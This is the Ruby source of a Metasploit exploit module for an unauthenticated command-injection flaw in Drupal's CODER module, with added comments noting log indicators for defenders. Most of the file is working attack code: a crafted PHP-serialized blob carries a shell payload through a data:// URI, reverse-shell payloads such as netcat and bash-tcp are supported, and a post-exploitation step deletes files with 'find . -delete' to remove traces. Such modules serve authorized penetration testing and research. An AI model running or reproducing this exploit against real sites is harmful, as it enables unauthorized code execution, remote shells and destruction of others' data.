Path: blob/master/modules/exploits/unix/webapp/drupal_coder_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for the Drupal CODER module
# (drupal.org/node/2765575). Every request this module makes is an
# unauthenticated HTTP GET to
#   <TARGETURI>/sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php
# and the exploit path carries its input in the `file` query parameter as a
# `data://text/plain;base64,...` URI. That path + parameter combination is the
# durable indicator a defender can look for in web server access logs; the
# post-exploitation cleanup below removes on-disk artifacts, so logs are
# typically the only trace left.
class MetasploitModule < Msf::Exploit::Remote
  # Reliable, no memory corruption involved (command injection via a
  # PHP-unserialized configuration blob).
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, the payload constraints and the single
  # TARGETURI option. `needs_cleanup` is set so on_new_session is invoked.
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Drupal CODER Module Remote Command Execution',
      'Description' => %q{
        This module exploits a Remote Command Execution vulnerability in the
        Drupal CODER Module. Unauthenticated users can execute arbitrary
        commands under the context of the web server user.

        The CODER module doesn't sufficiently validate user inputs in a script
        file that has the PHP extension. A malicious unauthenticated user can
        make requests directly to this file to execute arbitrary commands.
        The module does not need to be enabled for this to be exploited.

        This module was tested against CODER 2.5 with Drupal 7.5 installed on
        Ubuntu Server.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Nicky Bloor <[email protected]>', # discovery
          'Mehmet Ince <[email protected]>' # msf module
        ],
      'References' =>
        [
          ['URL', 'https://www.drupal.org/node/2765575']
        ],
      'Privileged' => false,
      'Payload' =>
        {
          # The encoded command is embedded in a PHP-serialized string in
          # #exploit; its length feeds into that string's declared size.
          'Space' => 250,
          'DisableNops' => true,
          # NOTE(review): why "/" (0x2f) is excluded is not documented here —
          # presumably constrained by how the value is consumed on the target;
          # confirm before changing.
          'BadChars' => "\x2f",
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
            },
        },
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Targets' => [ ['Automatic', {}] ],
      'DisclosureDate' => '2016-07-13',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
      ]
    )

    # Ensures the framework calls on_new_session after a shell is obtained.
    self.needs_cleanup = true
  end

  # Vulnerability check: GETs the upgrade script with no parameters and looks
  # for the error text the script emits when `file` is missing. A match only
  # proves the script is reachable and unauthenticated, not that the injection
  # works, hence CheckCode::Appears rather than Vulnerable. Any other response
  # (including no response at all) is reported as Safe.
  #
  # @return [Exploit::CheckCode]
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
    )

    if res && res.body.include?('file parameter is not setNo path to parameter file')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Builds a PHP-serialized configuration blob (an associative array with
  # `paths`, `theme_cache`, `variables`, `upgrades`, `extensions` and `items`
  # keys) and hands it to the upgrade script inline via a data:// URI in the
  # `file` GET parameter, so no file has to be uploaded first. The payload is
  # placed inside the `new_dir` value of the single `items` entry.
  #
  # The serialized form is length-prefixed (s:<len>:"<bytes>"), so the
  # declared length must match the bytes exactly or PHP's unserialize
  # rejects the blob.
  def exploit
    p = ''
    p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
    p << 's:11:"theme_cache";s:16:"theme_cache_test";'
    p << 's:9:"variables";s:14:"variables_test";'
    p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
    p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
    p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
    p << 's:7:"new_dir";s:'
    # +5 accounts for the three bytes of '-v;' before the payload and the
    # two bytes of ' #' after it; together they make up the new_dir string.
    p << (payload.encoded.length + 5).to_s
    p << ':"-v;'
    p << payload.encoded
    p << ' #";s:4:"name";s:4:"test";}}}'

    # Inline the blob so the target never has to fetch or store a file.
    pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"

    # encode_params is disabled so the data:// URI is sent verbatim.
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
      'encode_params' => false,
      'vars_get' => {
        'file' => pl
      }
    )
  end

  # XXX: FileDropper can't handle weird filenames
  #
  # Post-exploitation cleanup run on the new session. The `[ -f ... ]` guard
  # is the only thing keeping this from running elsewhere: when the session's
  # working directory contains coder_upgrade.run.php, every other file under
  # that directory tree is deleted. For responders this means the upgrade
  # artifacts written during exploitation will be gone; the access-log entry
  # for the request is what remains.
  #
  # @param session [Msf::Session] the session just opened by the payload
  def on_new_session(session)
    # This find command should be decently portable...
    command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
    print_status("Cleaning up: #{command}")
    session.shell_command_token(command)
  end
end